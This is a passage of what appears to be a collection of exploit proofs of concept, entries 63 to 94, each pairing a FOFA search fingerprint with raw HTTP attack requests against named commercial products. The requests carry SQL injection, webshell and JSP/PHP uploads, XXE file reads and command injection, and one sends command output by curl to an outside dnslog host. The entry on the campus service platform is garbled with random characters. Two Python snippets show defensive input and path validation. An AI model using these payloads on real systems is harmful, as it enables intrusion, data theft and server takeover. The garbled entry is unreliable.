Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

A vulnerable target answers about five seconds later than the same request without the WAITFOR.

65. Youkate (优卡特) 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"

A 200 response means the account test123456 / 123456 has been created without any prior login.

POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The target is vulnerable if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the hash the injected HashBytes('MD5','102103122') call returns.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"

newdocId and filename give the name of the file that is written, dir gives the directory it is written to, and fileType gives its extension.

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js path suffix gets the request past an extension-based authentication filter; a vulnerable target answers about five seconds late.

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same ;.js suffix and five-second delay check as entry 68.

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"

POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command base64-encoded: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The elided __VIEWSTATE value is the payload that triggers it.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"

GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"

The xmlValue parameter carries a DOCTYPE whose external entity points at file:///c:/windows/win.ini; the entity is referenced in the VALUE field, so the file content comes back in the response.

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 581
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"

POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"

PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台service.action远程命令执行1 ^; L5 a ?; @
FOFA:title="掌上校园服务管理平台"
; a0 {* e# L9 W! v/ e, JPOST /service_transport/service.action HTTP/1.1
1 H: U! r/ F9 S# x! E9 O% [7 fHost: x.x.x.x7 z' R C" ]$ s, L0 }% m- s# V6 e8 \; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0* X1 s% j, I+ i9 c$ A; x4 }
Connection: close
- q6 J8 p: j" a. IContent-Length: 2115 ~0 f2 V8 D& o4 |. u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; N! t" e( S. w i- N; h
Accept-Encoding: gzip, deflate
" C! ~7 ?8 v' d$ s e7 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* _; A$ e Q6 q x5 \) m0 k5 W. JCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4* n6 r) [$ Z0 D6 M3 u8 x
Upgrade-Insecure-Requests: 1# G" X# e& ?" c# s
6 E; O* G# D, {: J
{
2 [* l. Y9 s" c# H4 S: q"command": "GetFZinfo",
' M0 \& e6 M# e$ q& r' d* P% m "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\") {5 {7 K5 z+ R8 g
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 Z U9 @( N, _
}1 Y* V8 v8 J3 H; }; Y
: o# f1 ^2 T% ~8 Q( _: ^
! G5 q) o$ U+ ], o. c; z
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.16 ~2 L' e% u3 M1 R0 j, Z9 e
Host: x.x.x.x
. W+ B* w+ e x8 F
% T+ Q" @, i$ C; A- h5 ~: k9 _9 x2 D; i) r& o
77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器

GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) 天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"

POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then fetch the written JSP:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"

POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

The Cmd header carries the command; the elided JSON body is what makes the server execute it.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

The sql value is rendered as a FreeMarker template, the same Execute builtin as in entry 76; the command's output is exfiltrated through a DNS lookup.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
 "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"

The exploit request is shown below; it drops a Godzilla (哥斯拉) webshell. accountId traverses into tomcat/webapps, and the elided body is what gets written there.

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting shell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"

The host value breaks out of the ping command with a newline (%0a) and uses ${IFS} in place of a space.

POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter decides the stored path, so the file lands in the web root and is reachable at /jfhatuwe.php

88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the gateway writes a PHP file into its own web root.

GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request the file the command wrote: /txzfsrur.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"

The path ends in .js%70 (the p of .jsp URL-encoded) to slip past a suffix-based filter; the GUID value appends union select 111*222, so a vulnerable target returns 24642 in the response.

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"

jsondata[ip] is handed to the ping helper unfiltered; here the value ipconfig is executed in its place.

POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

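The command-injection entries above (75, 79, 82, 86, 88 and 90) are variations of one handler shape: a host, path or time value is concatenated into a command line that a shell parses, so %0a, |, ; or backticks start a second command. The Python below is an added example, not code from any of those products or from this page: it puts the vulnerable concatenation next to a hardened ping handler that accepts only an IP literal or an RFC 1123 host name and runs ping through an argument vector with no shell. The sample inputs are the decoded parameters from those entries; the function and constant names are assumptions for the example.

```python
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 host name: labels of letters, digits and hyphens, no leading or trailing
# hyphen, dot-separated, at most 253 characters. fullmatch() is used so that a
# trailing newline cannot slip past a "$" anchor.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?"
)


def vulnerable_ping_line(host: str) -> str:
    """The pattern behind the ping/network-test handlers above: the parameter is
    glued into a command line that a shell then parses, so a newline (%0a), a
    pipe, a semicolon or backticks all start a second command."""
    return "ping -c 1 " + host


def validate_host(host: str) -> str:
    """Return host unchanged if it is an IP literal or a host name; raise ValueError otherwise."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"refusing host parameter {host!r}")


def is_host(value: str) -> bool:
    """Boolean form of validate_host for callers that only need accept/reject."""
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def ping_argv(host: str, count: int = 1) -> List[str]:
    """Argument vector for the hardened handler: validated host, fixed option set,
    and no shell anywhere on the path (subprocess.run with shell=False)."""
    return ["ping", "-c", str(int(count)), validate_host(host)]


def run_ping(host: str, timeout: float = 5.0) -> int:
    """Execute the hardened command and return ping's exit status."""
    result = subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=timeout)
    return result.returncode


if __name__ == "__main__":
    # Decoded forms of the injected parameters from entries 75, 79, 82, 86, 88 and 90.
    samples = ["\ncat${IFS}/etc/passwd\n", "|id", "`ifconfig>test28256.txt`",
               '"|id;"', "ipconfig", "192.0.2.1"]
    for sample in samples:
        print(repr(sample), "->", ping_argv(sample) if is_host(sample) else "rejected")
```

ipconfig (entry 90) passes the host check, and that is fine: without a shell it is one argv element that ping fails to resolve, whereas the vulnerable handler executed it as a command. The same holds for any value that slipped through the regex; it can only ever be ping's target argument, and a leading hyphen is rejected so it cannot become an option either.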
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"

The ..;/ segment steps past the gateway's path-prefix access control (the servlet container strips the ;-delimited path parameter and then normalizes .. away), and fileName then traverses to /etc/passwd.

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

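Entries 61, 63, 67, 80, 85, 87 and 91 are all a base directory joined with a client-controlled path, name or extension and then read or written. The Python below is an added example, not code from any of those products or from this page: a vulnerable join next to a containment check built on realpath and commonpath, plus a server-chosen upload name whose extension must be on an allow list. UPLOAD_BASE, the allow list and the function names are assumptions for the example; the sample paths are the ones used in those entries.

```python
import os
import posixpath
import secrets
from typing import Optional
from urllib.parse import unquote

# Base directory assumed for the example; it need not exist for the checks to run.
UPLOAD_BASE = "/srv/app/uploads"
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png", ".jpg", ".jpeg", ".xlsx"}


class PathRejected(ValueError):
    """Raised when a client-supplied path or name fails the containment checks."""


def vulnerable_join(base_dir: str, user_path: str) -> str:
    """The pattern behind the entries above: decode, concatenate, trust the result.
    normpath makes the escape visible: ../config.ini resolves to the parent directory."""
    return os.path.normpath(os.path.join(base_dir, unquote(user_path)))


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path beneath base_dir and refuse anything that escapes it."""
    decoded = unquote(user_path)            # ..%2F arrives URL-encoded (entry 63)
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    # Treat backslashes as separators and drop leading slashes so the join can
    # never become absolute; then let realpath collapse every ".." and symlink.
    relative = decoded.replace("\\", "/").lstrip("/")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        raise PathRejected(f"path escapes {base_dir}: {user_path!r}")
    return target


def is_contained(base_dir: str, user_path: str) -> bool:
    """Boolean form of safe_join for callers that only need accept/reject."""
    try:
        safe_join(base_dir, user_path)
        return True
    except PathRejected:
        return False


def stored_name(client_filename: str, token: Optional[str] = None) -> str:
    """Server-chosen name for an upload: random stem plus an allow-listed extension.
    The client's basename is consulted only for its extension, so a filename, or a
    separate fileType/suffix parameter (entries 67, 87), of .jsp/.php/.aspx is refused."""
    ext = posixpath.splitext(posixpath.basename(client_filename.replace("\\", "/")))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise PathRejected(f"extension not allowed: {ext or '<none>'}")
    return (token or secrets.token_hex(16)) + ext


def is_allowed_name(client_filename: str) -> bool:
    """Boolean form of stored_name."""
    try:
        stored_name(client_filename, "x")
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Path parameters from entries 63, 80, 85, 87 and 91, plus one legitimate value.
    for p in ["..%2Fconfig.ini", "../xykqmfxpoas.jsp", "../../../tomcat/webapps",
              "/../../../jfhatuwe.php", "../../../../../../../etc/passwd", "2024/report.pdf"]:
        verdict = "ok" if is_contained(UPLOAD_BASE, p) else "rejected"
        print(f"{p!r:40} vulnerable -> {vulnerable_join(UPLOAD_BASE, p)}   safe -> {verdict}")
```

The containment check does not by itself address entry 91: there the fileName traversal is only half of the problem, and the ..;/ segment is what defeats a gateway that authorizes on the raw URL prefix while the backend container drops the ; path parameter and normalizes .. away. Authorize inside the application rather than on a proxy's view of the path, and still reject traversal in fileName as above.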
92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization; the Testcmd header carries the command, as Cmd does in entry 83.
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"

POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="

POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="

POST /?g=obj_area_import_save HTTP/1.1
